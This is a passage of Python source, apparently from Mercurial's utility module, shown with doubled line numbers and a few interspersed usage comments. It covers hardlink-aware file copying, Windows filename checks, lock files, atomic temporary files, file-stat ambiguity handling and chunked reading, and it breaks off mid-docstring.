1811 1811 oldstat = None
1812 1812 if os.path.lexists(dest):
1813 1813 if checkambig:
1814 1814 oldstat = checkambig and filestat.frompath(dest)
1815 1815 unlink(dest)
1816 1816 if hardlink:
1817 1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1818 1818 # unless we are confident that dest is on a whitelisted filesystem.
1819 1819 try:
1820 1820 fstype = getfstype(os.path.dirname(dest))
1821 1821 except OSError:
1822 1822 fstype = None
1823 1823 if fstype not in _hardlinkfswhitelist:
1824 1824 hardlink = False
1825 1825 if hardlink:
1826 1826 try:
1827 1827 oslink(src, dest)
1828 1828 return
1829 1829 except (IOError, OSError):
1830 1830 pass # fall back to normal copy
1831 1831 if os.path.islink(src):
1832 1832 os.symlink(os.readlink(src), dest)
1833 1833 # copying the timestamps is skipped for symlinks, but in general it
1834 1834 # isn't needed for them anyway
1835 1835 else:
1836 1836 try:
1837 1837 shutil.copyfile(src, dest)
1838 1838 if copystat:
1839 1839 # copystat also copies mode
1840 1840 shutil.copystat(src, dest)
1841 1841 else:
1842 1842 shutil.copymode(src, dest)
1843 1843 if oldstat and oldstat.stat:
1844 1844 newstat = filestat.frompath(dest)
1845 1845 if newstat.isambig(oldstat):
1846 1846 # stat of copied file is ambiguous to original one
1847 1847 advanced = (
1848 1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1849 1849 os.utime(dest, (advanced, advanced))
1850 1850 except shutil.Error as inst:
1851 1851 raise Abort(str(inst))
1852 1852
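# A hedged usage sketch for copyfile() (paths are illustrative): asking for a
# hardlink is only honoured when the destination filesystem is in the
# whitelist above, and a failed oslink() silently degrades to a plain copy.
#
#   >>> copyfile(b'.hg/store/data/foo.i', b'backup/foo.i', hardlink=True)
#   >>> # on e.g. a CIFS mount this quietly falls back to a regular copy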
1853 1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1854 1854 """Copy a directory tree using hardlinks if possible."""
1855 1855 num = 0
1856 1856
1857 1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1858 1858
1859 1859 if os.path.isdir(src):
1860 1860 if hardlink is None:
1861 1861 hardlink = (os.stat(src).st_dev ==
1862 1862 os.stat(os.path.dirname(dst)).st_dev)
1863 1863 topic = gettopic()
1864 1864 os.mkdir(dst)
1865 1865 for name, kind in listdir(src):
1866 1866 srcname = os.path.join(src, name)
1867 1867 dstname = os.path.join(dst, name)
1868 1868 def nprog(t, pos):
1869 1869 if pos is not None:
1870 1870 return progress(t, pos + num)
1871 1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1872 1872 num += n
1873 1873 else:
1874 1874 if hardlink is None:
1875 1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1876 1876 os.stat(os.path.dirname(dst)).st_dev)
1877 1877 topic = gettopic()
1878 1878
1879 1879 if hardlink:
1880 1880 try:
1881 1881 oslink(src, dst)
1882 1882 except (IOError, OSError):
1883 1883 hardlink = False
1884 1884 shutil.copy(src, dst)
1885 1885 else:
1886 1886 shutil.copy(src, dst)
1887 1887 num += 1
1888 1888 progress(topic, num)
1889 1889 progress(topic, None)
1890 1890
1891 1891 return hardlink, num
1892 1892
1893 1893 _winreservednames = {
1894 1894 'con', 'prn', 'aux', 'nul',
1895 1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1896 1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1897 1897 }
1898 1898 _winreservedchars = ':*?"<>|'
1899 1899 def checkwinfilename(path):
1900 1900 r'''Check that the base-relative path is a valid filename on Windows.
1901 1901 Returns None if the path is ok, or a UI string describing the problem.
1902 1902
1903 1903 >>> checkwinfilename(b"just/a/normal/path")
1904 1904 >>> checkwinfilename(b"foo/bar/con.xml")
1905 1905 "filename contains 'con', which is reserved on Windows"
1906 1906 >>> checkwinfilename(b"foo/con.xml/bar")
1907 1907 "filename contains 'con', which is reserved on Windows"
1908 1908 >>> checkwinfilename(b"foo/bar/xml.con")
1909 1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1910 1910 "filename contains 'AUX', which is reserved on Windows"
1911 1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1912 1912 "filename contains ':', which is reserved on Windows"
1913 1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1914 1914 "filename contains '\\x07', which is invalid on Windows"
1915 1915 >>> checkwinfilename(b"foo/bar/bla ")
1916 1916 "filename ends with ' ', which is not allowed on Windows"
1917 1917 >>> checkwinfilename(b"../bar")
1918 1918 >>> checkwinfilename(b"foo\\")
1919 1919 "filename ends with '\\', which is invalid on Windows"
1920 1920 >>> checkwinfilename(b"foo\\/bar")
1921 1921 "directory name ends with '\\', which is invalid on Windows"
1922 1922 '''
1923 1923 if path.endswith('\\'):
1924 1924 return _("filename ends with '\\', which is invalid on Windows")
1925 1925 if '\\/' in path:
1926 1926 return _("directory name ends with '\\', which is invalid on Windows")
1927 1927 for n in path.replace('\\', '/').split('/'):
1928 1928 if not n:
1929 1929 continue
1930 1930 for c in _filenamebytestr(n):
1931 1931 if c in _winreservedchars:
1932 1932 return _("filename contains '%s', which is reserved "
1933 1933 "on Windows") % c
1934 1934 if ord(c) <= 31:
1935 1935 return _("filename contains '%s', which is invalid "
1936 1936 "on Windows") % escapestr(c)
1937 1937 base = n.split('.')[0]
1938 1938 if base and base.lower() in _winreservednames:
1939 1939 return _("filename contains '%s', which is reserved "
1940 1940 "on Windows") % base
1941 1941 t = n[-1:]
1942 1942 if t in '. ' and n not in '..':
1943 1943 return _("filename ends with '%s', which is not allowed "
1944 1944 "on Windows") % t
1945 1945
1946 1946 if pycompat.iswindows:
1947 1947 checkosfilename = checkwinfilename
1948 1948 timer = time.clock
1949 1949 else:
1950 1950 checkosfilename = platform.checkosfilename
1951 1951 timer = time.time
1952 1952
1953 1953 if safehasattr(time, "perf_counter"):
1954 1954 timer = time.perf_counter
1955 1955
1956 1956 def makelock(info, pathname):
1957 1957 """Create a lock file atomically if possible
1958 1958
1959 1959 This may leave a stale lock file if symlink isn't supported and signal
1960 1960 interrupt is enabled.
1961 1961 """
1962 1962 try:
1963 1963 return os.symlink(info, pathname)
1964 1964 except OSError as why:
1965 1965 if why.errno == errno.EEXIST:
1966 1966 raise
1967 1967 except AttributeError: # no symlink in os
1968 1968 pass
1969 1969
1970 1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1971 1971 ld = os.open(pathname, flags)
1972 1972 os.write(ld, info)
1973 1973 os.close(ld)
1974 1974
1975 1975 def readlock(pathname):
1976 1976 try:
1977 1977 return os.readlink(pathname)
1978 1978 except OSError as why:
1979 1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1980 1980 raise
1981 1981 except AttributeError: # no symlink in os
1982 1982 pass
1983 1983 fp = posixfile(pathname, 'rb')
1984 1984 r = fp.read()
1985 1985 fp.close()
1986 1986 return r
1987 1987
1988 1988 def fstat(fp):
1989 1989 '''stat file object that may not have fileno method.'''
1990 1990 try:
1991 1991 return os.fstat(fp.fileno())
1992 1992 except AttributeError:
1993 1993 return os.stat(fp.name)
1994 1994
1995 1995 # File system features
1996 1996
1997 1997 def fscasesensitive(path):
1998 1998 """
1999 1999 Return true if the given path is on a case-sensitive filesystem
2000 2000
2001 2001 Requires a path (like /foo/.hg) ending with a foldable final
2002 2002 directory component.
2003 2003 """
2004 2004 s1 = os.lstat(path)
2005 2005 d, b = os.path.split(path)
2006 2006 b2 = b.upper()
2007 2007 if b == b2:
2008 2008 b2 = b.lower()
2009 2009 if b == b2:
2010 2010 return True # no evidence against case sensitivity
2011 2011 p2 = os.path.join(d, b2)
2012 2012 try:
2013 2013 s2 = os.lstat(p2)
2014 2014 if s2 == s1:
2015 2015 return False
2016 2016 return True
2017 2017 except OSError:
2018 2018 return True
2019 2019
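# An illustrative call (the result depends on the filesystem backing the
# path): the probe above re-stats the path with its final component
# case-folded, so that component must actually change under upper()/lower().
#
#   >>> fscasesensitive(b'/repo/.hg')  # e.g. True on ext4, False on HFS+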
2020 2020 try:
2021 2021 import re2
2022 2022 _re2 = None
2023 2023 except ImportError:
2024 2024 _re2 = False
2025 2025
2026 2026 class _re(object):
2027 2027 def _checkre2(self):
2028 2028 global _re2
2029 2029 try:
2030 2030 # check if match works, see issue3964
2031 2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2032 2032 except ImportError:
2033 2033 _re2 = False
2034 2034
2035 2035 def compile(self, pat, flags=0):
2036 2036 '''Compile a regular expression, using re2 if possible
2037 2037
2038 2038 For best performance, use only re2-compatible regexp features. The
2039 2039 only flags from the re module that are re2-compatible are
2040 2040 IGNORECASE and MULTILINE.'''
2041 2041 if _re2 is None:
2042 2042 self._checkre2()
2043 2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2044 2044 if flags & remod.IGNORECASE:
2045 2045 pat = '(?i)' + pat
2046 2046 if flags & remod.MULTILINE:
2047 2047 pat = '(?m)' + pat
2048 2048 try:
2049 2049 return re2.compile(pat)
2050 2050 except re2.error:
2051 2051 pass
2052 2052 return remod.compile(pat, flags)
2053 2053
2054 2054 @propertycache
2055 2055 def escape(self):
2056 2056 '''Return the version of escape corresponding to self.compile.
2057 2057
2058 2058 This is imperfect because whether re2 or re is used for a particular
2059 2059 function depends on the flags, etc, but it's the best we can do.
2060 2060 '''
2061 2061 global _re2
2062 2062 if _re2 is None:
2063 2063 self._checkre2()
2064 2064 if _re2:
2065 2065 return re2.escape
2066 2066 else:
2067 2067 return remod.escape
2068 2068
2069 2069 re = _re()
2070 2070
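# A hedged usage sketch: the singleton above prefers re2 when that module is
# importable and only IGNORECASE/MULTILINE are requested, and otherwise falls
# back to the stdlib engine, so callers see the same interface either way.
#
#   >>> r = re.compile(br'ba[rz]', remod.IGNORECASE)
#   >>> bool(r.match(b'BAZ'))
#   True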
2071 2071 _fspathcache = {}
2072 2072 def fspath(name, root):
2073 2073 '''Get name in the case stored in the filesystem
2074 2074
2075 2075 The name should be relative to root, and be normcase-ed for efficiency.
2076 2076
2077 2077 Note that this function is unnecessary, and should not be
2078 2078 called, for case-sensitive filesystems (simply because it's expensive).
2079 2079
2080 2080 The root should be normcase-ed, too.
2081 2081 '''
2082 2082 def _makefspathcacheentry(dir):
2083 2083 return dict((normcase(n), n) for n in os.listdir(dir))
2084 2084
2085 2085 seps = pycompat.ossep
2086 2086 if pycompat.osaltsep:
2087 2087 seps = seps + pycompat.osaltsep
2088 2088 # Protect backslashes. This gets silly very quickly.
2089 2089 seps = seps.replace('\\', '\\\\')
2090 2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2091 2091 dir = os.path.normpath(root)
2092 2092 result = []
2093 2093 for part, sep in pattern.findall(name):
2094 2094 if sep:
2095 2095 result.append(sep)
2096 2096 continue
2097 2097
2098 2098 if dir not in _fspathcache:
2099 2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2100 2100 contents = _fspathcache[dir]
2101 2101
2102 2102 found = contents.get(part)
2103 2103 if not found:
2104 2104 # retry "once per directory" per "dirstate.walk" which
2105 2105 # may take place for each patch of "hg qpush", for example
2106 2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2107 2107 found = contents.get(part)
2108 2108
2109 2109 result.append(found or part)
2110 2110 dir = os.path.join(dir, part)
2111 2111
2112 2112 return ''.join(result)
2113 2113
2114 2114 def checknlink(testfile):
2115 2115 '''check whether hardlink count reporting works properly'''
2116 2116
2117 2117 # testfile may be open, so we need a separate file for checking to
2118 2118 # work around issue2543 (or testfile may get lost on Samba shares)
2119 2119 f1, f2, fp = None, None, None
2120 2120 try:
2121 2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2122 2122 suffix='1~', dir=os.path.dirname(testfile))
2123 2123 os.close(fd)
2124 2124 f2 = '%s2~' % f1[:-2]
2125 2125
2126 2126 oslink(f1, f2)
2127 2127 # nlinks() may behave differently for files on Windows shares if
2128 2128 # the file is open.
2129 2129 fp = posixfile(f2)
2130 2130 return nlinks(f2) > 1
2131 2131 except OSError:
2132 2132 return False
2133 2133 finally:
2134 2134 if fp is not None:
2135 2135 fp.close()
2136 2136 for f in (f1, f2):
2137 2137 try:
2138 2138 if f is not None:
2139 2139 os.unlink(f)
2140 2140 except OSError:
2141 2141 pass
2142 2142
2143 2143 def endswithsep(path):
2144 2144 '''Check path ends with os.sep or os.altsep.'''
2145 2145 return (path.endswith(pycompat.ossep)
2146 2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2147 2147
2148 2148 def splitpath(path):
2149 2149 '''Split path by os.sep.
2150 2150 Note that this function does not use os.altsep because it is
2151 2151 merely a convenience wrapper around "xxx.split(os.sep)".
2152 2152 It is recommended to use os.path.normpath() before using this
2153 2153 function if needed.'''
2154 2154 return path.split(pycompat.ossep)
2155 2155
2156 2156 def gui():
2157 2157 '''Are we running in a GUI?'''
2158 2158 if pycompat.isdarwin:
2159 2159 if 'SSH_CONNECTION' in encoding.environ:
2160 2160 # handle SSH access to a box where the user is logged in
2161 2161 return False
2162 2162 elif getattr(osutil, 'isgui', None):
2163 2163 # check if a CoreGraphics session is available
2164 2164 return osutil.isgui()
2165 2165 else:
2166 2166 # pure build; use a safe default
2167 2167 return True
2168 2168 else:
2169 2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2170 2170
2171 2171 def mktempcopy(name, emptyok=False, createmode=None):
2172 2172 """Create a temporary file with the same contents from name
2173 2173
2174 2174 The permission bits are copied from the original file.
2175 2175
2176 2176 If the temporary file is going to be truncated immediately, you
2177 2177 can use emptyok=True as an optimization.
2178 2178
2179 2179 Returns the name of the temporary file.
2180 2180 """
2181 2181 d, fn = os.path.split(name)
2182 2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2183 2183 os.close(fd)
2184 2184 # Temporary files are created with mode 0600, which is usually not
2185 2185 # what we want. If the original file already exists, just copy
2186 2186 # its mode. Otherwise, manually obey umask.
2187 2187 copymode(name, temp, createmode)
2188 2188 if emptyok:
2189 2189 return temp
2190 2190 try:
2191 2191 try:
2192 2192 ifp = posixfile(name, "rb")
2193 2193 except IOError as inst:
2194 2194 if inst.errno == errno.ENOENT:
2195 2195 return temp
2196 2196 if not getattr(inst, 'filename', None):
2197 2197 inst.filename = name
2198 2198 raise
2199 2199 ofp = posixfile(temp, "wb")
2200 2200 for chunk in filechunkiter(ifp):
2201 2201 ofp.write(chunk)
2202 2202 ifp.close()
2203 2203 ofp.close()
2204 2204 except: # re-raises
2205 2205 try:
2206 2206 os.unlink(temp)
2207 2207 except OSError:
2208 2208 pass
2209 2209 raise
2210 2210 return temp
2211 2211
2212 2212 class filestat(object):
2213 2213 """help to exactly detect change of a file
2214 2214
2215 2215 The 'stat' attribute is the result of 'os.stat()' if the specified
2216 2216 'path' exists. Otherwise, it is None. This spares callers a
2217 2217 separate preliminary 'exists()' check.
2218 2218 """
2219 2219 def __init__(self, stat):
2220 2220 self.stat = stat
2221 2221
2222 2222 @classmethod
2223 2223 def frompath(cls, path):
2224 2224 try:
2225 2225 stat = os.stat(path)
2226 2226 except OSError as err:
2227 2227 if err.errno != errno.ENOENT:
2228 2228 raise
2229 2229 stat = None
2230 2230 return cls(stat)
2231 2231
2232 2232 @classmethod
2233 2233 def fromfp(cls, fp):
2234 2234 stat = os.fstat(fp.fileno())
2235 2235 return cls(stat)
2236 2236
2237 2237 __hash__ = object.__hash__
2238 2238
2239 2239 def __eq__(self, old):
2240 2240 try:
2241 2241 # if ambiguity between stat of new and old file is
2242 2242 # avoided, comparison of size, ctime and mtime is enough
2243 2243 # to exactly detect change of a file regardless of platform
2244 2244 return (self.stat.st_size == old.stat.st_size and
2245 2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2246 2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2247 2247 except AttributeError:
2248 2248 pass
2249 2249 try:
2250 2250 return self.stat is None and old.stat is None
2251 2251 except AttributeError:
2252 2252 return False
2253 2253
2254 2254 def isambig(self, old):
2255 2255 """Examine whether new (= self) stat is ambiguous against old one
2256 2256
2257 2257 "S[N]" below means stat of a file at N-th change:
2258 2258
2259 2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2260 2260 - S[n-1].ctime == S[n].ctime
2261 2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2262 2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2263 2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2264 2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2265 2265
2266 2266 Case (*2) above means that a file was changed twice or more within
2267 2267 the same second (= S[n-1].ctime), and comparison of timestamps
2268 2268 is therefore ambiguous.
2269 2269
2270 2270 The basic idea to avoid such ambiguity is "advance mtime by 1 sec,
2271 2271 if the timestamp is ambiguous".
2272 2272
2273 2273 But advancing mtime only in case (*2) doesn't work as
2274 2274 expected, because naturally advanced S[n].mtime in case (*1)
2275 2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2276 2276
2277 2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2278 2278 treated as ambiguous regardless of mtime, to avoid overlooking
2279 2279 changes hidden by such mtime collisions.
2280 2280
2281 2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2282 2282 S[n].mtime", even if size of a file isn't changed.
2283 2283 """
2284 2284 try:
2285 2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2286 2286 except AttributeError:
2287 2287 return False
2288 2288
2289 2289 def avoidambig(self, path, old):
2290 2290 """Change file stat of specified path to avoid ambiguity
2291 2291
2292 2292 'old' should be previous filestat of 'path'.
2293 2293
2294 2294 This skips avoiding ambiguity, if a process doesn't have
2295 2295 appropriate privileges for 'path'. This returns False in this
2296 2296 case.
2297 2297
2298 2298 Otherwise, this returns True, as "ambiguity is avoided".
2299 2299 """
2300 2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2301 2301 try:
2302 2302 os.utime(path, (advanced, advanced))
2303 2303 except OSError as inst:
2304 2304 if inst.errno == errno.EPERM:
2305 2305 # utime() on the file created by another user causes EPERM,
2306 2306 # if a process doesn't have appropriate privileges
2307 2307 return False
2308 2308 raise
2309 2309 return True
2310 2310
2311 2311 def __ne__(self, other):
2312 2312 return not self == other
2313 2313
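# A minimal sketch of the intended calling pattern (the file name is
# illustrative): snapshot the old stat, rewrite the file under a lock, then
# push mtime forward if the new timestamps would be ambiguous.
#
#   >>> old = filestat.frompath(b'.hg/dirstate')
#   >>> # ... rewrite .hg/dirstate while holding wlock ...
#   >>> new = filestat.frompath(b'.hg/dirstate')
#   >>> if new.isambig(old):
#   ...     new.avoidambig(b'.hg/dirstate', old)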
2314 2314 class atomictempfile(object):
2315 2315 '''writable file object that atomically updates a file
2316 2316
2317 2317 All writes will go to a temporary copy of the original file. Call
2318 2318 close() when you are done writing, and atomictempfile will rename
2319 2319 the temporary copy to the original name, making the changes
2320 2320 visible. If the object is destroyed without being closed, all your
2321 2321 writes are discarded.
2322 2322
2323 2323 checkambig argument of constructor is used with filestat, and is
2324 2324 useful only if target file is guarded by any lock (e.g. repo.lock
2325 2325 or repo.wlock).
2326 2326 '''
2327 2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2328 2328 self.__name = name # permanent name
2329 2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2330 2330 createmode=createmode)
2331 2331 self._fp = posixfile(self._tempname, mode)
2332 2332 self._checkambig = checkambig
2333 2333
2334 2334 # delegated methods
2335 2335 self.read = self._fp.read
2336 2336 self.write = self._fp.write
2337 2337 self.seek = self._fp.seek
2338 2338 self.tell = self._fp.tell
2339 2339 self.fileno = self._fp.fileno
2340 2340
2341 2341 def close(self):
2342 2342 if not self._fp.closed:
2343 2343 self._fp.close()
2344 2344 filename = localpath(self.__name)
2345 2345 oldstat = self._checkambig and filestat.frompath(filename)
2346 2346 if oldstat and oldstat.stat:
2347 2347 rename(self._tempname, filename)
2348 2348 newstat = filestat.frompath(filename)
2349 2349 if newstat.isambig(oldstat):
2350 2350 # stat of changed file is ambiguous to original one
2351 2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2352 2352 os.utime(filename, (advanced, advanced))
2353 2353 else:
2354 2354 rename(self._tempname, filename)
2355 2355
2356 2356 def discard(self):
2357 2357 if not self._fp.closed:
2358 2358 try:
2359 2359 os.unlink(self._tempname)
2360 2360 except OSError:
2361 2361 pass
2362 2362 self._fp.close()
2363 2363
2364 2364 def __del__(self):
2365 2365 if safehasattr(self, '_fp'): # constructor actually did something
2366 2366 self.discard()
2367 2367
2368 2368 def __enter__(self):
2369 2369 return self
2370 2370
2371 2371 def __exit__(self, exctype, excvalue, traceback):
2372 2372 if exctype is not None:
2373 2373 self.discard()
2374 2374 else:
2375 2375 self.close()
2376 2376
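# A hedged usage sketch (the target name is illustrative): writes go to a
# sibling temporary file, and only close() -- or a clean 'with' exit --
# renames it over the target, so a crash mid-write leaves the original file
# untouched.
#
#   >>> with atomictempfile(b'somefile', mode='wb', checkambig=True) as fp:
#   ...     fp.write(b'new contents\n')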
2377 2377 def unlinkpath(f, ignoremissing=False):
2378 2378 """unlink and remove the directory if it is empty"""
2379 2379 if ignoremissing:
2380 2380 tryunlink(f)
2381 2381 else:
2382 2382 unlink(f)
2383 2383 # try removing directories that might now be empty
2384 2384 try:
2385 2385 removedirs(os.path.dirname(f))
2386 2386 except OSError:
2387 2387 pass
2388 2388
2389 2389 def tryunlink(f):
2390 2390 """Attempt to remove a file, ignoring ENOENT errors."""
2391 2391 try:
2392 2392 unlink(f)
2393 2393 except OSError as e:
2394 2394 if e.errno != errno.ENOENT:
2395 2395 raise
2396 2396
2397 2397 def makedirs(name, mode=None, notindexed=False):
2398 2398 """recursive directory creation with parent mode inheritance
2399 2399
2400 2400 Newly created directories are marked as "not to be indexed by
2401 2401 the content indexing service", if ``notindexed`` is specified
2402 2402 for "write" mode access.
2403 2403 """
2404 2404 try:
2405 2405 makedir(name, notindexed)
2406 2406 except OSError as err:
2407 2407 if err.errno == errno.EEXIST:
2408 2408 return
2409 2409 if err.errno != errno.ENOENT or not name:
2410 2410 raise
2411 2411 parent = os.path.dirname(os.path.abspath(name))
2412 2412 if parent == name:
2413 2413 raise
2414 2414 makedirs(parent, mode, notindexed)
2415 2415 try:
2416 2416 makedir(name, notindexed)
2417 2417 except OSError as err:
2418 2418 # Catch EEXIST to handle races
2419 2419 if err.errno == errno.EEXIST:
2420 2420 return
2421 2421 raise
2422 2422 if mode is not None:
2423 2423 os.chmod(name, mode)
2424 2424
2425 2425 def readfile(path):
2426 2426 with open(path, 'rb') as fp:
2427 2427 return fp.read()
2428 2428
2429 2429 def writefile(path, text):
2430 2430 with open(path, 'wb') as fp:
2431 2431 fp.write(text)
2432 2432
2433 2433 def appendfile(path, text):
2434 2434 with open(path, 'ab') as fp:
2435 2435 fp.write(text)
2436 2436
2437 2437 class chunkbuffer(object):
2438 2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2439 2439 iterator over chunks of arbitrary size."""
2440 2440
2441 2441 def __init__(self, in_iter):
2442 2442 """in_iter is the iterator that's iterating over the input chunks."""
2443 2443 def splitbig(chunks):
2444 2444 for chunk in chunks:
2445 2445 if len(chunk) > 2**20:
2446 2446 pos = 0
2447 2447 while pos < len(chunk):
2448 2448 end = pos + 2 ** 18
2449 2449 yield chunk[pos:end]
2450 2450 pos = end
2451 2451 else:
2452 2452 yield chunk
2453 2453 self.iter = splitbig(in_iter)
2454 2454 self._queue = collections.deque()
2455 2455 self._chunkoffset = 0
2456 2456
2457 2457 def read(self, l=None):
2458 2458 """Read L bytes of data from the iterator of chunks of data.
2459 2459 Returns less than L bytes if the iterator runs dry.
2460 2460
2461 2461 If size parameter is omitted, read everything"""
2462 2462 if l is None:
2463 2463 return ''.join(self.iter)
2464 2464
2465 2465 left = l
2466 2466 buf = []
2467 2467 queue = self._queue
2468 2468 while left > 0:
2469 2469 # refill the queue
2470 2470 if not queue:
2471 2471 target = 2**18
2472 2472 for chunk in self.iter:
2473 2473 queue.append(chunk)
2474 2474 target -= len(chunk)
2475 2475 if target <= 0:
2476 2476 break
2477 2477 if not queue:
2478 2478 break
2479 2479
2480 2480 # The easy way to do this would be to queue.popleft(), modify the
2481 2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2482 2482 # where we read partial chunk content, this incurs 2 dequeue
2483 2483 # mutations and creates a new str for the remaining chunk in the
2484 2484 # queue. Our code below avoids this overhead.
2485 2485
2486 2486 chunk = queue[0]
2487 2487 chunkl = len(chunk)
2488 2488 offset = self._chunkoffset
2489 2489
2490 2490 # Use full chunk.
2491 2491 if offset == 0 and left >= chunkl:
2492 2492 left -= chunkl
2493 2493 queue.popleft()
2494 2494 buf.append(chunk)
2495 2495 # self._chunkoffset remains at 0.
2496 2496 continue
2497 2497
2498 2498 chunkremaining = chunkl - offset
2499 2499
2500 2500 # Use all of the unconsumed part of the chunk.
2501 2501 if left >= chunkremaining:
2502 2502 left -= chunkremaining
2503 2503 queue.popleft()
2504 2504 # offset == 0 is enabled by block above, so this won't merely
2505 2505 # copy via ``chunk[0:]``.
2506 2506 buf.append(chunk[offset:])
2507 2507 self._chunkoffset = 0
2508 2508
2509 2509 # Partial chunk needed.
2510 2510 else:
2511 2511 buf.append(chunk[offset:offset + left])
2512 2512 self._chunkoffset += left
2513 2513 left -= chunkremaining
2514 2514
2515 2515 return ''.join(buf)
2516 2516
2517 2517 def filechunkiter(f, size=131072, limit=None):
2518 2518 """Create a generator that produces the data in the file size
2519 2519 (default 131072) bytes at a time, up to optional limit (default is
2520 2520 to read all data). Chunks may be less than size bytes if the
2521 2521 chunk is the last chunk in the file, or the file is a socket or
2522 2522 some other type of file that sometimes reads less data than is
2523 2523 requested."""
2524 2524 assert size >= 0
2525 2525 assert limit is None or limit >= 0
2526 2526 while True:
2527 2527 if limit is None:
2528 2528 nbytes = size
2529 2529 else:
2530 2530 nbytes = min(limit, size)
2531 2531 s = nbytes and f.read(nbytes)
2532 2532 if not s:
2533 2533 break
2534 2534 if limit:
2535 2535 limit -= len(s)
2536 2536 yield s
2537 2537
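# A small sketch tying the two helpers above together: filechunkiter() turns
# a file object into fixed-size chunks and chunkbuffer() lets callers
# re-slice that stream into reads of arbitrary length.
#
#   >>> fp = stringio(b'abcdefghij')
#   >>> cb = chunkbuffer(filechunkiter(fp, size=4))
#   >>> cb.read(3), cb.read(7)
#   ('abc', 'defghij')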
2538 2538 class cappedreader(object):
2539 2539 """A file object proxy that allows reading up to N bytes.
2540 2540
2541 2541 Given a source file object, instances of this type allow reading up to
2542 2542 N bytes from that source file object. Attempts to read past the allowed
2543 2543 limit are treated as EOF.
2544 2544
2545 2545 It is assumed that I/O is not performed on the original file object
2546 2546 in addition to I/O that is performed by this instance. If there is,
2547 2547 state tracking will get out of sync and unexpected results will ensue.
2548 2548 """
2549 2549 def __init__(self, fh, limit):
2550 2550 """Allow reading up to <limit> bytes from <fh>."""
2551 2551 self._fh = fh
2552 2552 self._left = limit
2553 2553
2554 2554 def read(self, n=-1):
2555 2555 if not self._left:
2556 2556 return b''
2557 2557
2558 2558 if n < 0:
2559 2559 n = self._left
2560 2560
2561 2561 data = self._fh.read(min(n, self._left))
2562 2562 self._left -= len(data)
2563 2563 assert self._left >= 0
2564 2564
2565 2565 return data
2566 2566
2567 2567 def readinto(self, b):
2568 2568 res = self.read(len(b))
2569 2569 if res is None:
2570 2570 return None
2571 2571
2572 2572 b[0:len(res)] = res
2573 2573 return len(res)
2574 2574
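# A minimal usage sketch: wrapping a file object caps how much a consumer may
# pull from it, and reads past the limit simply report EOF.
#
#   >>> fh = stringio(b'0123456789')
#   >>> r = cappedreader(fh, 4)
#   >>> r.read(), r.read()
#   ('0123', '')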
2575 2575 def stringmatcher(pattern, casesensitive=True):
2576 2576 """
2577 2577 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2578 2578 returns the matcher name, pattern, and matcher function.
2579 2579 missing or unknown prefixes are treated as literal matches.
2580 2580
2581 2581 helper for tests:
2582 2582 >>> def test(pattern, *tests):
2583 2583 ... kind, pattern, matcher = stringmatcher(pattern)
2584 2584 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2585 2585 >>> def itest(pattern, *tests):
2586 2586 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2587 2587 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2588 2588
2589 2589 exact matching (no prefix):
2590 2590 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2591 2591 ('literal', 'abcdefg', [False, False, True])
2592 2592
2593 2593 regex matching ('re:' prefix)
2594 2594 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2595 2595 ('re', 'a.+b', [False, False, True])
2596 2596
2597 2597 force exact matches ('literal:' prefix)
2598 2598 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2599 2599 ('literal', 're:foobar', [False, True])
2600 2600
2601 2601 unknown prefixes are ignored and treated as literals
2602 2602 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2603 2603 ('literal', 'foo:bar', [False, False, True])
2604 2604
2605 2605 case insensitive regex matches
2606 2606 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2607 2607 ('re', 'A.+b', [False, False, True])
2608 2608
2609 2609 case insensitive literal matches
